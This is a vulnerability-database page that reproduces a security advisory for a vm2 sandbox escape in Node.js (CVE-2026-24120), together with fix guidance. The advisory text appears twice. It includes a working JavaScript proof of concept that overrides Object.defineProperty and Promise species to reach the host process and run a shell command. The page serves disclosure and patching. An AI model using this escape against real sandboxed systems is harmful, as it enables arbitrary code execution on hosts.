Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.8
CVE-2026-24120: vm2 Sandbox Escape in Node.js Versions Prior to 3.10.5
CVE-2026-24120
GHSA-qvjj-29qf-hp7p
Summary
An outdated version of the vm2 sandbox for Node.js can be tricked into allowing malicious code to break free and run commands on the host computer. This is fixed in version 3.10.5. Update to the latest version to ensure security.
What to do
- Update vm2 to version 3.10.5.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | – | vm2 |
<= 3.10.3 Fix: upgrade to 3.10.5
|
Original title
VM2 Has Sandbox Breakout Through Promise Species
Original description
### Summary
The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 introduced the function `resetPromiseSpecies` https://github.com/patriksimek/vm2/blob/4b009c2d4b1131c01810c1205e641d614c322a29/lib/setup-sandbox.js#L35C7-L39.
This function changes the `species` property of promise objects back to a known value. However, it uses the function `[].includes` and `Object.defineProperty` which can be overewritten to prevent the species from being changed.
### PoC
The following code demonstrates this issue by aquiring the host process object and executing `touch pwned`.
```js
const {VM} = require("vm2");
const vm = new VM();
vm.run(`
Object.defineProperty=()=>{};
async function fn() {
const e = new Error();
e.name = Symbol();
return e.stack;
}
p = fn();
p.constructor = {
[Symbol.species]: class FakePromise {
constructor(executor) {
executor(
(x) => x,
(err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch pwned'); }
)
}
}
};
p.then();
`);
```
### Impact
Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.
The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 introduced the function `resetPromiseSpecies` https://github.com/patriksimek/vm2/blob/4b009c2d4b1131c01810c1205e641d614c322a29/lib/setup-sandbox.js#L35C7-L39.
This function changes the `species` property of promise objects back to a known value. However, it uses the function `[].includes` and `Object.defineProperty` which can be overewritten to prevent the species from being changed.
### PoC
The following code demonstrates this issue by aquiring the host process object and executing `touch pwned`.
```js
const {VM} = require("vm2");
const vm = new VM();
vm.run(`
Object.defineProperty=()=>{};
async function fn() {
const e = new Error();
e.name = Symbol();
return e.stack;
}
p = fn();
p.constructor = {
[Symbol.species]: class FakePromise {
constructor(executor) {
executor(
(x) => x,
(err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch pwned'); }
)
}
}
};
p.then();
`);
```
### Impact
Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.
nvd CVSS3.1
9.8
Vulnerability type
CWE-94
Code Injection
CWE-693
Protection Mechanism Failure
- https://github.com/patriksimek/vm2/releases/tag/v3.10.5
- https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p
- https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
- https://nvd.nist.gov/vuln/detail/CVE-2026-24120
- https://github.com/advisories/GHSA-qvjj-29qf-hp7p
Published: 5 May 2026 · Updated: 28 May 2026 · First seen: 4 May 2026